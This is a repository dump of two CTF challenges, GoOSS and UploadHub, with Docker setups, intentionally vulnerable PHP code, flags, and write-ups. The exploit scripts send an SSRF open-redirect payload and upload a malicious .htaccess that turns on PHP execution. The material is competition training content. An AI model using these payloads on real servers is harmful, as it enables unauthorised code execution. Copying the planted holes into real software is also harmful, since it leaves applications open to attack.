├── README.md └── 津门杯 ├── .DS_Store ├── GoOSS ├── .DS_Store ├── Docker │ ├── .DS_Store │ ├── Dockerfile │ └── app │ │ ├── .DS_Store │ │ ├── flag │ │ ├── index.php │ │ ├── main │ │ └── start.sh └── Write-Up │ ├── exp.py │ └── writeup.md └── UploadHub ├── .DS_Store ├── Docker ├── .DS_Store ├── app │ ├── .DS_Store │ ├── apache2.conf │ ├── shuyu.sql │ ├── start.sh │ ├── tar.py │ └── www │ │ ├── .DS_Store │ │ ├── back.jpg │ │ ├── config.php │ │ ├── index.php │ │ └── upload │ │ └── index.html └── dockerfile └── Write-Up ├── exp.py └── writeup.md /README.md: -------------------------------------------------------------------------------- 1 | # MyCTFChanllenge 2 | 出过的CTF题目 3 | -------------------------------------------------------------------------------- /津门杯/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/.DS_Store -------------------------------------------------------------------------------- /津门杯/GoOSS/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/GoOSS/.DS_Store -------------------------------------------------------------------------------- /津门杯/GoOSS/Docker/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/GoOSS/Docker/.DS_Store -------------------------------------------------------------------------------- /津门杯/GoOSS/Docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.0-apache 2 | 3 | 4 | # COPY ./sources.list /etc/apt/sources.list 5 | # RUN \ 6 | # apt-get update && \ 7 | # apt-get install -y php-fpm && \ 8 | # apt-get install -y nginx && \ 9 | # apt-get install -y vim && \ 10 | # apt-get install -y curl 11 | 12 | # COPY ./default /etc/nginx/sites-available/default 13 | # COPY ./nginx.conf /etc/nginx/nginx.conf 14 | 15 | # 添加启动脚本 16 | COPY ./app/index.php /var/www/html/index.php 17 | COPY ./app/flag /flag 18 | COPY ./app/main /opt/main 19 | COPY ./app/start.sh /start.sh 20 | 21 | RUN chmod 755 /flag 22 | RUN mkdir /var/www/html/files 23 | CMD ["bash","/start.sh"] 24 | -------------------------------------------------------------------------------- /津门杯/GoOSS/Docker/app/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/GoOSS/Docker/app/.DS_Store -------------------------------------------------------------------------------- /津门杯/GoOSS/Docker/app/flag: -------------------------------------------------------------------------------- 1 | flag{30e308e8e7122579b8ea2fae774d1999} -------------------------------------------------------------------------------- /津门杯/GoOSS/Docker/app/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /津门杯/GoOSS/Docker/app/main: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/GoOSS/Docker/app/main -------------------------------------------------------------------------------- /津门杯/GoOSS/Docker/app/start.sh: -------------------------------------------------------------------------------- 1 | service apache2 start && /opt/main -------------------------------------------------------------------------------- /津门杯/GoOSS/Write-Up/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | # challenge url 4 | url = "http://122.112.246.208:20002/vul" 5 | session = requests.Session() 6 | 7 | rawBody = "{\"url\":\"http://127.0.0.1:1234//114.116.44.23/..\"}" 8 | headers = {"Content-Type":"application/json"} 9 | 10 | response = session.post(url, data=rawBody, headers=headers) 11 | 12 | print("Status code: %i" % response.status_code) 13 | print("Response body: %s" % response.content) 14 | 15 | -------------------------------------------------------------------------------- /津门杯/GoOSS/Write-Up/writeup.md: -------------------------------------------------------------------------------- 1 | ## this is a writeup 2 | 3 | 4 | http.Dir("/dir").open() 5 | 可以打开文件 或者 目录,如果open函数的参数为. 或者 .. 返回对象也会被认为是一个目录 6 | 7 | 于是我们可以根据fileMidderware中的内容,传入 8 | GET //www.com/.. HTTP/1.1 9 | 10 | 56行代码判断..为路径且不以/结尾,所以302 返回//www.com/../造成任意302 11 | 12 | 再通过vul控制器ssrf 配合 即可攻击url 13 | 虽然我们无法输入url参数,但302不限次数,先跳到自己的vps,在302到带参数的内网地址即可获取flag 14 | 15 | index.php(vps) 16 | ``` 17 | 21 | ```php 22 | 23 | 请求http://challenge.ip:port//vps.ip/.. 即可(用burp,有些浏览器会自动删除.. -------------------------------------------------------------------------------- /津门杯/UploadHub/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/UploadHub/.DS_Store -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/UploadHub/Docker/.DS_Store -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/UploadHub/Docker/app/.DS_Store -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/apache2.conf: -------------------------------------------------------------------------------- 1 | # This is the main Apache server configuration file. It contains the 2 | # configuration directives that give the server its instructions. 3 | # See http://httpd.apache.org/docs/2.4/ for detailed information about 4 | # the directives and /usr/share/doc/apache2/README.Debian about Debian specific 5 | # hints. 6 | # 7 | # 8 | # Summary of how the Apache 2 configuration works in Debian: 9 | # The Apache 2 web server configuration in Debian is quite different to 10 | # upstream's suggested way to configure the web server. This is because Debian's 11 | # default Apache2 installation attempts to make adding and removing modules, 12 | # virtual hosts, and extra configuration directives as flexible as possible, in 13 | # order to make automating the changes and administering the server as easy as 14 | # possible. 15 | 16 | # It is split into several files forming the configuration hierarchy outlined 17 | # below, all located in the /etc/apache2/ directory: 18 | # 19 | # /etc/apache2/ 20 | # |-- apache2.conf 21 | # | `-- ports.conf 22 | # |-- mods-enabled 23 | # | |-- *.load 24 | # | `-- *.conf 25 | # |-- conf-enabled 26 | # | `-- *.conf 27 | # `-- sites-enabled 28 | # `-- *.conf 29 | # 30 | # 31 | # * apache2.conf is the main configuration file (this file). It puts the pieces 32 | # together by including all remaining configuration files when starting up the 33 | # web server. 34 | # 35 | # * ports.conf is always included from the main configuration file. It is 36 | # supposed to determine listening ports for incoming connections which can be 37 | # customized anytime. 38 | # 39 | # * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/ 40 | # directories contain particular configuration snippets which manage modules, 41 | # global configuration fragments, or virtual host configurations, 42 | # respectively. 43 | # 44 | # They are activated by symlinking available configuration files from their 45 | # respective *-available/ counterparts. These should be managed by using our 46 | # helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See 47 | # their respective man pages for detailed information. 48 | # 49 | # * The binary is called apache2. Due to the use of environment variables, in 50 | # the default configuration, apache2 needs to be started/stopped with 51 | # /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not 52 | # work with the default configuration. 53 | 54 | 55 | # Global configuration 56 | # 57 | 58 | # 59 | # ServerRoot: The top of the directory tree under which the server's 60 | # configuration, error, and log files are kept. 61 | # 62 | # NOTE! If you intend to place this on an NFS (or otherwise network) 63 | # mounted filesystem then please read the Mutex documentation (available 64 | # at ); 65 | # you will save yourself a lot of trouble. 66 | # 67 | # Do NOT add a slash at the end of the directory path. 68 | # 69 | #ServerRoot "/etc/apache2" 70 | 71 | # 72 | # The accept serialization lock file MUST BE STORED ON A LOCAL DISK. 73 | # 74 | #Mutex file:${APACHE_LOCK_DIR} default 75 | 76 | # 77 | # The directory where shm and other runtime files will be stored. 78 | # 79 | 80 | DefaultRuntimeDir ${APACHE_RUN_DIR} 81 | 82 | # 83 | # PidFile: The file in which the server should record its process 84 | # identification number when it starts. 85 | # This needs to be set in /etc/apache2/envvars 86 | # 87 | PidFile ${APACHE_PID_FILE} 88 | 89 | # 90 | # Timeout: The number of seconds before receives and sends time out. 91 | # 92 | Timeout 300 93 | 94 | # 95 | # KeepAlive: Whether or not to allow persistent connections (more than 96 | # one request per connection). Set to "Off" to deactivate. 97 | # 98 | KeepAlive On 99 | 100 | # 101 | # MaxKeepAliveRequests: The maximum number of requests to allow 102 | # during a persistent connection. Set to 0 to allow an unlimited amount. 103 | # We recommend you leave this number high, for maximum performance. 104 | # 105 | MaxKeepAliveRequests 100 106 | 107 | # 108 | # KeepAliveTimeout: Number of seconds to wait for the next request from the 109 | # same client on the same connection. 110 | # 111 | KeepAliveTimeout 5 112 | 113 | 114 | # These need to be set in /etc/apache2/envvars 115 | User ${APACHE_RUN_USER} 116 | Group ${APACHE_RUN_GROUP} 117 | 118 | # 119 | # HostnameLookups: Log the names of clients or just their IP addresses 120 | # e.g., www.apache.org (on) or 204.62.129.132 (off). 121 | # The default is off because it'd be overall better for the net if people 122 | # had to knowingly turn this feature on, since enabling it means that 123 | # each client request will result in AT LEAST one lookup request to the 124 | # nameserver. 125 | # 126 | HostnameLookups Off 127 | 128 | # ErrorLog: The location of the error log file. 129 | # If you do not specify an ErrorLog directive within a 130 | # container, error messages relating to that virtual host will be 131 | # logged here. If you *do* define an error logfile for a 132 | # container, that host's errors will be logged there and not here. 133 | # 134 | ErrorLog ${APACHE_LOG_DIR}/error.log 135 | 136 | # 137 | # LogLevel: Control the severity of messages logged to the error_log. 138 | # Available values: trace8, ..., trace1, debug, info, notice, warn, 139 | # error, crit, alert, emerg. 140 | # It is also possible to configure the log level for particular modules, e.g. 141 | # "LogLevel info ssl:warn" 142 | # 143 | LogLevel warn 144 | 145 | # Include module configuration: 146 | IncludeOptional mods-enabled/*.load 147 | IncludeOptional mods-enabled/*.conf 148 | 149 | # Include list of ports to listen on 150 | Include ports.conf 151 | 152 | 153 | # Sets the default security model of the Apache2 HTTPD server. It does 154 | # not allow access to the root filesystem outside of /usr/share and /var/www. 155 | # The former is used by web applications packaged in Debian, 156 | # the latter may be used for local directories served by the web server. If 157 | # your system is serving content from a sub-directory in /srv you must allow 158 | # access here, or in any related virtual host. 159 | 160 | Options FollowSymLinks 161 | AllowOverride None 162 | Require all denied 163 | 164 | 165 | 166 | AllowOverride None 167 | Require all granted 168 | 169 | 170 | 171 | Options Indexes FollowSymLinks 172 | AllowOverride All 173 | Require all granted 174 | 175 | 176 | php_flag engine off 177 | 178 | # 179 | # Options Indexes FollowSymLinks 180 | # AllowOverride None 181 | # Require all granted 182 | # 183 | 184 | 185 | 186 | 187 | # AccessFileName: The name of the file to look for in each directory 188 | # for additional configuration directives. See also the AllowOverride 189 | # directive. 190 | # 191 | AccessFileName .htaccess 192 | 193 | # 194 | # The following lines prevent .htaccess and .htpasswd files from being 195 | # viewed by Web clients. 196 | # 197 | 198 | Require all denied 199 | 200 | 201 | 202 | # 203 | # The following directives define some format nicknames for use with 204 | # a CustomLog directive. 205 | # 206 | # These deviate from the Common Log Format definitions in that they use %O 207 | # (the actual bytes sent including headers) instead of %b (the size of the 208 | # requested file), because the latter makes it impossible to detect partial 209 | # requests. 210 | # 211 | # Note that the use of %{X-Forwarded-For}i instead of %h is not recommended. 212 | # Use mod_remoteip instead. 213 | # 214 | LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined 215 | LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined 216 | LogFormat "%h %l %u %t \"%r\" %>s %O" common 217 | LogFormat "%{Referer}i -> %U" referer 218 | LogFormat "%{User-agent}i" agent 219 | 220 | # Include of directories ignores editors' and dpkg's backup files, 221 | # see README.Debian for details. 222 | 223 | # Include generic snippets of statements 224 | IncludeOptional conf-enabled/*.conf 225 | 226 | # Include the virtual host configurations: 227 | IncludeOptional sites-enabled/*.conf 228 | 229 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet 230 | ServerName 127.0.0.1 -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/shuyu.sql: -------------------------------------------------------------------------------- 1 | -- phpMyAdmin SQL Dump 2 | -- version 4.9.2 3 | -- https://www.phpmyadmin.net/ 4 | -- 5 | -- 主机: 127.0.0.1:3306 6 | -- 生成日期: 2020-06-21 15:07:30 7 | -- 服务器版本: 5.7.28 8 | -- PHP 版本: 5.6.40 9 | 10 | SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; 11 | SET AUTOCOMMIT = 0; 12 | START TRANSACTION; 13 | SET time_zone = "+00:00"; 14 | 15 | 16 | /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; 17 | /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; 18 | /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; 19 | /*!40101 SET NAMES utf8mb4 */; 20 | 21 | -- 22 | -- 数据库: `shuyu` 23 | -- 24 | 25 | -- -------------------------------------------------------- 26 | 27 | -- 28 | -- 表的结构 `img` 29 | -- 30 | 31 | DROP TABLE IF EXISTS `img`; 32 | CREATE TABLE IF NOT EXISTS `img` ( 33 | `id` int(11) NOT NULL AUTO_INCREMENT, 34 | `filename` varchar(200) NOT NULL, 35 | PRIMARY KEY (`id`) 36 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8; 37 | COMMIT; 38 | 39 | /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; 40 | /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; 41 | /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; 42 | -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | find /var/lib/mysql -type f -exec touch {} \; && service mysql start 4 | /etc/init.d/apache2 start 5 | cron 6 | echo "* * * * * /bin/sh -c 'rm -rf /var/www/html/upload/*'" | crontab 7 | /bin/bash 8 | tail -f /dev/null 9 | -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/tar.py: -------------------------------------------------------------------------------- 1 | import tarfile 2 | import sys 3 | tar = tarfile.open(sys.argv[1], "r") 4 | tar.extractall() -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/www/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/UploadHub/Docker/app/www/.DS_Store -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/www/back.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/UploadHub/Docker/app/www/back.jpg -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/www/config.php: -------------------------------------------------------------------------------- 1 | $value) { 8 | $value= str_ireplace('\'','',$value); 9 | $value= str_ireplace('"','',$value); 10 | $value= str_ireplace('union','',$value); 11 | $value= str_ireplace('select','',$value); 12 | $value= str_ireplace('from','',$value); 13 | $value= str_ireplace('or','',$value); 14 | $_GET[$key] =$value; 15 | } 16 | ?> -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/www/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 生而为人,我很抱歉 4 | 5 | 6 | 7 |

电影太仁慈,总能让错过的人重新相遇;生活不一样,有的人说过再见就再也不见了 -网易云

8 | 9 |
11 | 12 | 13 | 14 |
15 | 16 | 17 | 0 && !in_array($fileext,$type) && $_FILES["file"]["size"] > 204800){ 30 | die('upload error'); 31 | }else{ 32 | 33 | $filename=addslashes($_FILES['file']['name']); 34 | $sql="insert into img (filename) values ('$filename')"; 35 | $conn->query($sql); 36 | 37 | $sql="select id from img where filename='$filename'"; 38 | $result=$conn->query($sql); 39 | 40 | if ($result->num_rows > 0) { 41 | while($row = $result->fetch_assoc()) { 42 | $id=$row["id"]; 43 | } 44 | 45 | move_uploaded_file($_FILES["file"]["tmp_name"],$upload.'/'.$filename); 46 | header("Location: index.php?id=$id"); 47 | } 48 | } 49 | } 50 | 51 | elseif (isset($_GET['id'])){ 52 | $id=intval($_GET['id']); 53 | $sql="select filename from img where id=$id"; 54 | $result=$conn->query($sql); 55 | if ($result->num_rows > 0) { 56 | while($row = $result->fetch_assoc()) { 57 | $filename=$row["filename"]; 58 | } 59 | $img=$upload.'/'.$filename; 60 | echo ""; 61 | } 62 | } 63 | 64 | 65 | ?> 66 | 74 | 75 | -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/www/upload/index.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/UploadHub/Docker/app/www/upload/index.html -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:14.04 2 | 3 | #ENV DEBIAN_FRONTEND noninteractive 4 | RUN sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list 5 | RUN sed -i 's/security.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list 6 | 7 | RUN apt-get update -y 8 | 9 | # install http 10 | RUN apt-get install -y apache2 11 | RUN mkdir -p /var/lock/apache2 /var/run/apache2 12 | 13 | RUN apt-get update && apt-get install -y libapache2-mod-php5 php5 php5-mysql mysql-server python3 python3-pip 14 | COPY app/www /var/www/html 15 | COPY app/shuyu.sql /root/shuyu.sql 16 | COPY app/start.sh /root/start.sh 17 | COPY app/apache2.conf /etc/apache2/apache2.conf 18 | COPY app/tar.py /tar.py 19 | 20 | RUN sed -i "315c disable_functions = error_log,mb_send_mail,imap_mail,system,unlink,rmdir,shell_exec,exec,putenv,mail,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,passthru,proc_open,popen,pcntl_exec,posix_mkfifo, pg_lo_import, dbmopen, dbase_open, popen, chgrp, chown, chmod, symlink,apache_setenv,define_syslog_variables, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_uname, proc_close, pclose, proc_nice, proc_terminate,curl_exec,curl_multi_exec,parse_ini_file,show_source,imap_open,imagecolormatch,fopen,copy,rename,readlink,tmpfile,tempnam,touch,link,file,ftp_connect,ftp_ssl_connect," /etc/php5/apache2/php.ini 21 | RUN sed -i '$a\ServerName 127.0.0.1' /etc/apache2/apache2.conf &&\ 22 | chmod -R 755 /var/www/html &&\ 23 | chmod -R 777 /var/www/html/upload&&\ 24 | rm /var/www/html/index.html&&\ 25 | chmod +x /root/start.sh 26 | 27 | 28 | RUN sed -i "N;32a\secure_file_priv=/tmp" /etc/mysql/my.cnf&&\ 29 | find /var/lib/mysql -type f -exec touch {} \; && service mysql start&&\ 30 | mysqladmin -u root password "root"&&\ 31 | mysql -u root -proot -e "create database shuyu;"&&\ 32 | mysql -u root -proot shuyu < /root/shuyu.sql 33 | 34 | RUN echo flag{e3a5fa12f003a831a9e077b9a7c46a4d}>/flag 35 | 36 | EXPOSE 80 37 | 38 | CMD ["/root/start.sh"] 39 | -------------------------------------------------------------------------------- /津门杯/UploadHub/Write-Up/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | # challenge url 4 | url = "http://127.0.0.1:8000" 5 | 6 | 7 | 8 | 9 | 10 | session = requests.Session() 11 | 12 | paramsGet = {"id":"1"} 13 | paramsPost = {"submit":"submit"} 14 | paramsMultipart = [('file', ('.htaccess', "\r\nForceType application/x-httpd-php\r\nSetHandler application/x-httpd-php\r\nRequire all granted\r\nphp_flag engine on\r\n\r\nphp_value auto_prepend_fi\\\r\nle .htaccess\r\n\x23", 'application/octet-stream'))] 15 | 16 | response = session.post(url, data=paramsPost, files=paramsMultipart, params=paramsGet,allow_redirects=False) 17 | 18 | # print("Status code: %i" % response.status_code) 19 | # print("Response body: %s" % response.content) 20 | 21 | location = response.headers['Location'] if response.status_code == 302 else None 22 | print(location) 23 | 24 | response = session.get(url+"/"+location) 25 | 26 | exp_url = re.search(r"